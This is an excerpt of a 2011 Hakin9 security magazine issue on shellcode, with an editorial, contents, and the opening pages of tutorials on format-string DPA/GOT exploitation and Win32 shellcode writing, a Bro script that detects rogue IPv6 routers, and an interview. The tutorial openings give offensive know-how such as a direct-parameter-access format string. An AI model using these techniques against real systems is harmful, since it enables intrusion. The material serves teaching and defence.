4 04/2011

04/2011 (04)
4
team
Editor in Chief: Grzegorz Tabaka
grzegorz.tabaka@hakin9.org
Managing Editor: Natalia Boniewicz
natalia.boniewicz@hakin9.org
Editorial Advisory Board: Rebecca Wynn, Matt Jonkman,
Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans,
Aby Rao
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@hakin9.org
Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob
Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson
Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira
Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeff rey Smith, Aby
Rao, Jason Duke, Carlos Alaya, Joseph Werns, Shane Hartman,
Jose L. Herrera
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 Expoiting Software magazine.
Senior Consultant/Publisher: Pawe Marciniak
CEO: Ewa Dudzic
ewa.dudzic@hakin9.org
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used program
by

Mathematical formulas created by Design Science MathType
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear Readers,
This very last of 2011 and pre-Christmas issue we have titled
Shellcode. This small peace of code, being simply a portable native
code, has the ability to run at any place in memory, for example,
inside an exploit to connect back to the attacker or do what the
attacker needs to do. It is the key behind any successful exploit.
If you are curious how to write your own shellcode, how to bypass the
limitations of your shellcode with null free shellcode and alphanumeric
shellcode, I highly encourage you to read an article Shellcode: From
a Simple Bug to OS Control written by Amr Thabet. You will learn how
to use the Metasploit framework to try out your exploit.
The article DPA Exploitation and GOTs with Python written by Craig
Wright is a follow-up and second part of a look at format strings in
the C and C++ programming languages; in particular, how these may
be abused. This time author endeavoured to make the process of
exploiting format string vulnerabilities as simple as possible for the
inexperienced exploit developer. You will learn how to write into the
address of our choosing using the exploitation of Direct Parameter
Access (DPA).
A well-known issue, the rogue router attack against IPv6 protocol
enabled network, exploits the router advertisement (RA) functionality
of ICMPv6 protocol. In the article Detecting Ipv6: Rouge Router
Incidents Using Bro NSM Matti Mantere will depict a method for
detecting three components of the CIA triad using open source
Bro NSM.
In the article Application Security 101: Our Dynamic Threat
Landscape Anthony Czarnik will show us how vulnerabilities in
applications that access sensitive data can lead to significant loss.
Do you want to know why managers love Python? Are you curious
what are the top emerging threats? If the answer is yes, do not miss
the interview with Aldo Ceccareli.
We wish you a beautiful Christmas and happy New Year!
Natalia Boniewicz
& Hakin9 Team

6 04/2011
CONTENTS
ATTACK PATTERN
8 DPA Exploitation and GOTs with Python
By Craig Wright
If we can write into the GOT, we can effectively redirect
the execution flow of a program and allowing ourselves
to gain a root shell. This article is a follow-up and
second part of a look at format strings in the C and
C++ programming languages; in particular, how these
may be abused. The article goes on to discuss crafting
attacks using Python in order to attack through DPA
(Direct Parameter Access) such that you can enact a 4-
byte overwrite in the DTORS and GOT. This time author
endeavoured to make the process of exploiting format
string vulnerabilities as simple as possible for the
inexperienced exploit developer. A basic knowledge of
Python has been assumed as well as an understanding
of the Linux operating system and how to use gdb. This
starts off with detailing the use of Direct Parameter
access and how this process works and then describes
the Global Offset Tables in detail. You will see that using
the exploitation of Direct Parameter Access (DPA) will
allow us to write into the address of our choosing.
16 Shellcode: From a Simple Bug to OS
Control
By Amr Thabet
The secret behind any good exploit is a reliable shellcode.
The shellcode is the most important element in your
exploit. Generating shellcode with automated tools only
helps so much in formulating your exploit. Knowing how
to create your own shellcode will help you overcome
barriers that lie ahead, and thats what this article will
demonstrate.
You will learn how to write a reliable shellcode on the
Win32 plaform, how to bypass the obstacles that you will
face in writing a win32 shellcode, and how to implement
your shellcode into Metasploit.
DEFENSE PATTERN
34 Detecting Ipv6: Rouge Router Incidents
Using Bro NSM
By Matti Mantere
Internet Protocol version 6 (IPv6) has been a long time
coming. As the protocol is making its entrance several
security risks of varying criticality are known to exist.
However, the amount of skilled personnel needed to
assure the security of IPv6 network deployment as well
as awareness of the said risks remains woefully low.
As IPv6 migration slowly gains momentum, situations
where administrators responsible for deployment of
network equipment have very poor knowledge and non-
existent operational experience of the new protocol are
unavoidable. Matti depicts one method for detecting
them using open source Bro NSM. Bro Network Security
Monitor (Bro NSM) is a flexible open source network
analysis framework that is freely distributed under BSD
license.
38 Application Security 101: Our Dynamic
Threat Landscape
By Anthony Czarnik
Over the last couple of years, industry statistics clearly
indicate two major changing trends regarding the
www.hakin9.org/en 7
CONTENTS
information technology threat landscape. First, applications are now
targeted as the primary attack vector, to the extent that 75% of current,
reported attacks target the application layer. Although we have interest in
threats, as security professionals with a responsibility to the owners of our
assets, our security decisions should ultimately be based on risk. You will
see how vulnerabilities in applications that access sensitive data can lead
to significant loss.
INTERVIEW
42 Interview with Aldo Ceccarelli
Two simple ingredients: when choosing follow your real passion in order
to be able to deliver your best talents and at full capacity; be curious
when learning and generous when teaching. Bonus track: patient when
teamworking! says Aldo Ceccarelli, Chief Information Officer and
Business Process Expert at SEDAMYL SPA, joint-venture partner of Syral.
You will see why managers love Python and what are the top emerging
threats.
8
ATTACK PATTERN
04/2011 www.hakin9.org/en 9
DPA exploitation and GOTs with Python
I
t then continues the attack by exploiting the GOT
and injecting shell code. We demonstrate how these
simple but still often overlooked and even generally
accepted vulnerabilities can be used to read arbitrary
locations from memory, write to memory, execute
commands, and, finally, to gain a shell.
Introduction
In the first part of this article (presented in Hakin9
in Exploiting Software 2/2011), we discussed format
string attacks. In this article we are going to extend
these, beginning with DPA (Direct Parameter Access)
and moving to using the GOT (Global Offset Table) to
spawn a root shell. To gain a complete understanding of
this process, it is recommended that part one from last
months issue is read first.
In this paper, we have endeavoured to make the
process of exploiting format string vulnerabilities
as simple as possible for the inexperienced exploit
developer. A basic knowledge of Python has been
assumed as well as an understanding of the Linux
operating system and how to use gdb. This starts off
with detailing the use of Direct Parameter access and
how this process works and then describes the Global
Offset Tables in detail.
If we can write into the GOT, we can effectively
redirect the execution flow of a program and allowing
ourselves to gain a root shell. This process will also help
when there is some form of stack protection that stops
us from altering the address pointed to through EIP and
redirecting it to a shellcode address.
In this process, we will inject a reference in place of
that which the GOT references for a selected function.
Here we want to have a function that can execute
system commands as substitutes to overwriting the
subsequent instruction with the memory address that
the shellcode we wish to call. The modern protections
built into nearly all operating systems have started
to load the GOT in a read-only memory area. Where
this has occurred, the system avoids the exploitation
technique discussed in this paper to a large extent.
That being said, it is possible to find systems where
these protections have been disabled or older
unpatched systems where the complete attacks work
natively. At worst, even in a read-only system, the
GOT can be read.
Direct Parameter Access
DPA allows an attacker to access arguments through
the use of a $ qualifier. Just like we had to learn all
of that difficult math before we moved into formulaic
integrals in high school, last lesson we learned the hard
way to call arguments using format strings. DPA makes
format string attacks simple. It allows us to directly call
the location we wish to exploit instead of having to pad
attacks using %x%x%x Basically, as we can address the
argument directly, we do not have to increment the
byte count until we find the memory location we wish
to exploit.
We showed in the last article how the use of the
following syntax will allow us to access the 8th argument
from the stack (%8\$x%8\$n) using the $ qualifier. Again,
This article is a follow-up and second part of a look at format strings
in the C and C++ programming languages; in particular, how these
may be abused. The article goes on to discuss crafting attacks using
Python in order to attack through DPA (Direct Parameter Access)
such that you can enact a 4-byte overwrite in the DTORS and GOT
(Global Access Table).
DPA Exploitation
and GOTs with Python
Figure 1. What Happened To 100?

16
ATTACK PATTERN
04/2011 www.hakin9.org/en 17
Shellcode: From a Simple Bug to OS Control
I
n this article Im going to teach you how to write a
reliable shellcode on the Win32 plaform, how to
bypass the obstacles that you will face in writing a
win32 shellcode, and how to implement your shellcode
into Metasploit.
Part 1: The Basics
Whats Shellcode?
Shellcode is simply a portable native code. This
code has the ability to run at any place in memory,
for example, inside an exploit to connect back to the
attacker or do what the attacker needs to do.
The Three Types of Shellcode
Shellcode is classified by the limitations of the
environment that you are facing while crafting a program
to exploit a specific vulnerability.
Null Byte-Free Shellcode
In this type of shellcode, you are forced to write a
shellcode without any null byte. For example, while
exploiting a vulnerability in a string manipulation
code inside a function, C functions such as strcpy()
or sprintf() work by searching for the null byte in the
string (as strings are null terminated) without checking
on the maximum accepted length of this string. A
successful byte-free shellcode will make this application
susceptible to the buffer overflow vulnerability. If your
shellcode contains a NULL byte, this byte will be
interpreted as a string terminator, with the result that the
program accepts the shellcode in front of the NULL byte
and discards the rest. So you will have to avoid any null-
byte inside your shellcode, but you will have the ability
to use just one null byte the last byte.
Alphanumeric Shellcode:
In strings, its not common to see strange characters
or Latin characters inside. In this case, some IDSs
(Intrusion detection systems) detect these strings as
malicious especially when they include suspicious
sequence of opcodes. These systems could detect the
presence of shellcode. Not only that, but also some
applications filter the input string and accept only the
normal characters and numbers (a-z, A-Z and 0-9).
In this case, you need to write your shellcode in
characters. You are forced to use only these characters
and only accept bytes from 0x30 to 0x39 and from 0x40
to 0x5A and from 0x60 to 0x7A.
Egg-hunting Shellcode
In some vulnerabilities, you may have a very small
buffer to insert your shellcode. With the off-by-one
vulnerability, you are restricted to a specific size and
you cant send a shellcode bigger than that.
Alternatively, you could use two buffers to put your
shellcode into. One is for your real shellcode and the second
is for attacking and searching the first buffer for the eggs.
Part 2: Writing Shellcode
Shellcode Skeleton
Any shellcode consists of four parts: Getting the delta,
getting the kernel32 imagebase, getting your APIs and
the payload.
The secret behind any good exploit is a reliable shellcode. The
shellcode is the most important element in your exploit. Generating
shellcode with automated tools only helps so much in formulating
your exploit. Knowing how to create your own shellcode will help
you overcome barriers that lie ahead, and thats what this article will
demonstrate.
Shellcode:
From a Simple Bug to OS Control
Figure 1. Shellcode Skeleton

34
DEFENSE PATTERN
04/2011 www.hakin9.org/en 35
Detecting IPv6 Rogue Router Incidents Using Bro NSM
T
hese situations are bound to cause information
security events of varying gravity. We use the
term information security here as defined broadly
by the CIA triad, CIA for confidentiality, integrity and
availability.
A well-known issue, the rogue router attack against
IPv6 protocol enabled network, exploits the router
advertisement (RA) functionality of ICMPv6 protocol.
A rogue router incident can be caused by malicious
attackers or through poor deployment and configuration
of IPv6 capable equipment. Rogue router attack can be
used to break the confidentiality of the data, availability
of Internet access from local area network (LAN) and
data integrity e.g. in form of data manipulation by the
rogue router. Thus affecting all three components of the
CIA triad
In this article we depict one method for detecting them
using open source Bro NSM. Bro Network Security
Monitor (Bro NSM) is a flexible open source network
analysis framework that is freely distributed under BSD
license.
Introduction
Internet Protocol version 6 (IPv6) has been a long time
coming. As the protocol is making its entrance several
security risks of varying criticality are known to exist.
However, the amount of skilled personnel needed to
assure the security of IPv6 network deployment as
well as awareness of the said risks remains woefully
low.
Here we concentrate on the one particular issue
that is caused by a particular ICMPv6 message in
a particular configuration and setting. The ICMPv6
is a much more critical component of the IPv6
protocol than its predecessor ICMP was for Internet
Protocol version 4 (IPv4). For example, in IPv6, the
functionality that was previously handled by the
Address Resolution Protocol (ARP) is now being taken
up by the Internet Control Message Protocol version
6 (ICMPv6). Total filtering and blocking of all ICMP
traffic did not cripple IPv4, but in contrast disabling
the ICMPv6 will discernibly hamper the functionality
of IPv6. ICMPv6 runs on top of IPv6, having its own
As IPv6 migration slowly gains momentum, situations where
administrators responsible for deployment of network equipment
have very poor knowledge and non-existent operational experience
of the new protocol are unavoidable.
Detecting IPv6
Rogue Router Incidents Using Bro NSM
Listing 1. Partial icmp. bro listing of a development version
event icmp_router_advertisement(c: connection, icmp: icmp_conn)
{
print_log(c, icmp, "");

if ( |router_whitelist| == 0 || icmp$orig_h in router_whitelist )
return;

NOTICE([$note=ICMPRogueRouter,
$msg=fmt("rogue router advertisement from %s", icmp$orig_h)]);
}
38
DEFENSE PATTERN
04/2011 www.hakin9.org/en 39
Application Security 101
A
ccording to the Verizon 2010 Report, web
applications accounted for 54% of data breaches
and 92% of records breached. Although the
indication is that as a group, Information Security
professionals are currently doing a commendable job
guarding the perimeter and OS layer, it is also clear we
have our work cut out for us on the application front.
The second major trend on our threat landscape is
regarding intent. Over the last few years, cyber criminals
are generally not rogue individuals, but predominantly
organized groups, with the objective of financial or
political gain. Identity and credit card theft are the
most common avenues for financial gain. Political gain,
including state sponsored attacks, is often achieved
thru intellectual property theft or cyber terrorism,
including denial of service. Using a schoolyard analogy,
these are no longer bad boys spray painting the walls,
theyre gangs stealing our tuition funds.
Threats are relevant;
Risk is our ultimate focus
Although we have interest in threats, as security
professionals with a responsibility to the owners of
our assets, our security decisions should ultimately be
based on risk. Risk is the product of the threat level,
our degree of vulnerability and our potential loss. Thats
the formula. The reality is that a data breach, which
adversely affects our IT security pillars of confidentiality
and integrity, will cause you to lose your honor, and
by the way, they cost $6.6M on average, which will
probably cause you to lose your job.
Another common risk is compliance failure. If your IT
organization is responsible for protecting PHI (healthcare
data), failure is a HIPAA violation. Processing or storing
credit card data? Failure is a PCI violation. The added
risk with compliance is that you dont even need to
get breached to suffer a loss. Non-compliance results
in fines (consider that incurring HIPAA fines is also
becoming trendy since HITECH was passed).
Public reaction to data breaches has also become
severe. According to the Ponemon Institute, 33% of
consumers who have had their information breached,
terminate their relationship with the business partner
determined to be responsible. How bad is that? Go ask
your Marketing VP how much it cost to attain 33% of
your customers. The aggregate consequences from a
data breach can be brutal:
Lost customers & lost revenue (long term effect)
Legal & compliance problems
Reputational damage
Beyond a data breach, we must also be concerned
with Denial of Service attacks, degrading our
availability security pillar, and resulting in lost revenue
and lost customers.
Application vulnerabilities: the perfect storm
There is a reason that since we secured the OS and
perimeter fairly well, cyber criminals are targeting the
application layer. Applications consist of source code,
often from numerous sources, architectural decisions,
executable code, configurations, database integration,
implementation into the existing network, and more.
Applications are complex to secure and application
security is immature; the perfect storm. The result: both
Gartner and NIST reported that 95% of recently reported
vulnerabilities are located in software. SANS comparisons
highlighted that the number of vulnerabilities currently
being discovered in applications is tremendously higher
than the number being discovered in operating systems.
Gartner also estimates that two-thirds of web applications
Over the last couple of years, industry statistics clearly indicate two
major changing trends regarding the information technology threat
landscape. First, applications are now targeted as the primary attack
vector, to the extent that 75% of current, reported attacks target the
application layer.
Application Security 101
Our Dynamic Threat Landscape
04/2011 42
INTERVIEW
How did you realize that the solutions would
best fit your business model then other
methods?
Our must is learning to evaluate and introduce outsourcing
at best. Last outsourcing surveys (I like to remember State
of Outsourcing 2011 survey conducted in partnership with
The Outsourcing Unit at the London School of Economics
in particular) show that CIOs are achieving cost savings
from their arrangements with their services providers, but
an important issue is that sometimes we arent getting
much else in the way of business value. Heres how IT
solution buyers can change that.
According to this year outlook perspective IT service
providers arent likely to change their approaches
unless buyers demand more from them. Therefore,
IT outsourcing customers who want to move beyond
cost cutting must put business value at the forefront of
their outsourcing arrangements. Here are four ways to
accomplish that goal that I am trying to follow:
Stop taking the low-cost bait. Cost cutting deals will
deliver cost cutting.
Contract for value. Real business value gets short
shrift in most outsourcing deals.
Have the courage to change. Be willing to abandon
processes and technologies that dont deliver real
innovation goods.
Look beyond SLAs to business outcomes. Service
level agreements are important but business value
is tantamount. Work with your provider to create
outcome-based metrics for the relationship to
supplement the deals operational SLAs.
What separates your methods from others?
I am trying to focus on the fact that as CIOs we would
benefit from a framework for innovation, and some of
us operating in SME would be willing to pay more for
an outsourcer that really can help us formalize and
maintain a successful innovation process. A good
method for us was to institute monitoring of leading key
performance indicators and adopt formal root cause
analysis processes. In this manner, issues are detected
before they become critical, and once detected, can be
definitely eliminated.
Could you tell more about company that you
work for?
In the early 1950s the Frandino family founded
Sedamyl, a simple fruit distillery (its original name was
Seda).
From the earliest stages, the companys growth has
been characterized by dedication to maintaining its core
values. It has become the leading Italian producer of
wheat-based products for the food and paper industries,
as well as for fermentation.
Starch is used in various industries: food, textile,
paper, detergent, glue and plastic.
Glucose syrups, liquid or dehydrated, are used as
ingredients for soft drinks, ice creams, sweets and other
food products.
Grain Alcohol due to its neutral flavor and excellent
quality, has always been used in the production of high
quality spirits and liquors.
Gluten is used in the food industry, primarily for baked
goods.
Interview with
Aldo
Ceccarelli
Aldo Ceccarelli is Chief Information Officer and Business
Process Expert at SEDAMYL SPA, joint-venture partner of
Syral (Group Tereos, France) In the past he was member
of S-IT Management (in outsourcing for SEDAMYL SPA) at
Etea (http://www.eteagroup.com/), System Administrator,
Programmer and ISO 9000 Quality Manager at CITAL SRL
(http://www.cital.it)